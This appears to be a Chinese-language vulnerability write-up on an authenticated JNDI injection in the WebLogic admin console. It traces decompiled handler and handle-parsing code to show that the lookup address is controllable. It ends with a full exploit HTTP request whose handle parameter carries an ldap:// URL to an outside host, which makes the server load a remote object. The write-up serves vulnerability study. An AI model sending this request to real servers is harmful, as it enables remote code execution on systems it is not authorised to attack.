console的JNDI注入,需要登录。
consolejndi.portal中存在JNDIBindingPageGeneral
jndi绑定的东西
具体的处理逻辑在/PortalConfig/jndi/jndibinding.portlet
。
在com.bea.console.actions.jndi.JNDIBindingAction#execute
中就是处理逻辑
直接lookup了,就是要先过serverMBean != null
的条件。
在MBeanUtils.getAnyServerMBean(serverName)
中
有一个lookupServer()
,使用的是动态代理调用的,跟进到weblogic.management.jmx.MBeanServerInvocationHandler#invoke
其中method
值为
lookupServer就在这个类中weblogic.management.configuration.DomainMBeanImpl#lookupServer
用动态调试把存在的serverBean弄出来,让传入的serverName等于他满足dowhile条件就能使返回的serverBean不为空了,即AdminServer
。
现在serverBean不为空了,就要看jndi lookup的地址是否可控。
lookup的值有以下逻辑
1JndiBindingHandle bindingHandle = (JndiBindingHandle)this.getHandleContext(actionForm, request, "JNDIBinding");
2String context = bindingHandle.getContext();
3String bindName = bindingHandle.getBinding();
4String serverName = bindingHandle.getServer();
5String prefix = context;
6String suffix = bindName;
7if (prefix.length() > 0 && suffix.length() > 0) {
8prefix = prefix + ".";
9}
10Object boundObj = c.lookup(prefix + suffix)
前缀和后缀以及serverName都是从bindingHandle获取的,即JndiBindingHandle类,跟进bindingHandle.getContext()看下。
调用自身getComponent方法
1 protected String getComponent(int index) {
2 return this.getComponents()[index];
3 }
1private String[] getComponents() {
2 if (this.components == null) {
3 String serialized = this.getObjectIdentifier();
4 ArrayList componentList = new ArrayList();
5 StringBuffer currentComponent = new StringBuffer();
6 boolean lastWasSpecial = false;
7
8 for(int i = 0; i < serialized.length(); ++i) {
9 char c = serialized.charAt(i);
10 if (lastWasSpecial) {
11 if (c == '0') {
12 if (currentComponent == null) {
13 throw new AssertionError("Handle component already null : '" + serialized + '"');
14 }
15
16 if (currentComponent.length() > 0) {
17 throw new AssertionError("Null handle component preceeded by a character : '" + serialized + "'");
18 }
19
20 currentComponent = null;
21 } else if (c == '\\') {
22 if (currentComponent == null) {
23 throw new AssertionError("Null handle followed by \\ : '" + serialized + "'");
24 }
25
26 currentComponent.append('\\');
27 } else {
28 if (c != ';') {
29 throw new AssertionError("\\ in handle followed by a character :'" + serialized + "'");
30 }
31
32 if (currentComponent == null) {
33 throw new AssertionError("Null handle followed by ; : '" + serialized + "'");
34 }
35
36 currentComponent.append(';');
37 }
38
39 lastWasSpecial = false;
40 } else if (c == '\\') {
41 if (currentComponent == null) {
42 throw new AssertionError("Null handle followed by \\ : '" + serialized + "'");
43 }
44
45 lastWasSpecial = true;
46 } else if (c == ';') {
47 String component = currentComponent != null ? currentComponent.toString() : null;
48 componentList.add(component);
49 currentComponent = new StringBuffer();
50 } else {
51 if (currentComponent == null) {
52 throw new AssertionError("Null handle followed by a character : '" + serialized + "'");
53 }
54
55 currentComponent.append(c);
56 }
57 }
58
59 if (lastWasSpecial) {
60 throw new AssertionError("Last character in handle is \\ :'" + serialized + "'");
61 }
62
63 String component = currentComponent != null ? currentComponent.toString() : null;
64 componentList.add(component);
65 this.components = (String[])((String[])componentList.toArray(new String[componentList.size()]));
66 }
67
68 return this.components;
69}
整体逻辑就是用;
号分割,相当于全部可控,造成jndi注入。
最后捋一下整体条件
;
号隔开jndi地址 1GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://172.16.0;1:1389/aew0xy;AdminServer%22) HTTP/1.1
2Host: 172.16.1.134:7001
3Pragma: no-cache
4Cache-Control: no-cache
5Upgrade-Insecure-Requests: 1
6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
7Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
8Referer: http://172.16.1.134:7001/console/login/LoginForm.jsp
9Accept-Encoding: gzip, deflate
10Accept-Language: zh-CN,zh;q=0.9
11Cookie: ADMINCONSOLESESSION=8Xk3Y9pCjDLlUARpWoE3rhia67n0LKY5xuTzTHfWxz1ITlNDOob1!1254895310
12Connection: close
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。